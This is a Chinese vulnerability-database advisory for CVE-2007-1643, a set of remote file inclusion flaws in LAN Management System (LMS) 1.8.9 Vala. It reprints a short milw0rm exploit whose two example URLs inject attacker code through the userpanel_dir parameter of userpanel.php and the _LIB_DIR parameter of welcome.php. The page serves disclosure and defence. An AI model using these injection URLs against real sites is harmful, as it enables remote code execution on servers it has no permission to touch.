LMS 多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112516 漏洞类型 代码注入
发布时间 2007-03-22 更新时间 2007-04-05
CVE编号 CVE-2007-1643 CNNVD-ID CNNVD-200703-592
漏洞平台 PHP CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/3545
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-592
|漏洞详情
LANManagementSystem(LMS)1.8.9Vala及之前版本中存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到userpanel.php的CONFIG[directories][userpanel_dir]参数或到welcome.php的_LIB_DIR参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
DEVIL TEAM - HACKING POLISH TEAM

Author: Kacper
Contact: kacper1964@yahoo.pl
Homepage: http://www.rahim.webd.pl/
Irc: irc.milw0rm.com:6667 #devilteam 
--------------------------------------------
Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.


LMS <= 1.8.9 Vala Remote File Inclusion Vulnerabilities
script download/homepage: http://www.lms.org.pl/


--------------------------------------------
Vulnerabilities:

http://strona.pl/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=[evil_code]
http://strona.pl/lms_path/modules/welcome.php?_LIB_DIR=[evil_code]

# milw0rm.com [2007-03-22]
|参考资料

来源:XF
名称:lms-userpanelwelcome-file-include(33158)
链接:http://xforce.iss.net/xforce/xfdb/33158
来源:BID
名称:23100
链接:http://www.securityfocus.com/bid/23100
来源:BID
名称:23099
链接:http://www.securityfocus.com/bid/23099
来源:MILW0RM
名称:3545
链接:http://www.milw0rm.com/exploits/3545
来源:VUPEN
名称:ADV-2007-1086
链接:http://www.frsirt.com/english/advisories/2007/1086
来源:SECUNIA
名称:24621
链接:http://secunia.com/advisories/24621
来源:VIM
名称:20070426true:2distinctLMSRFI,oneold,onenew;andvagueACK
链接:http://www.attrition.org/pipermail/vim/2007-April/001560.html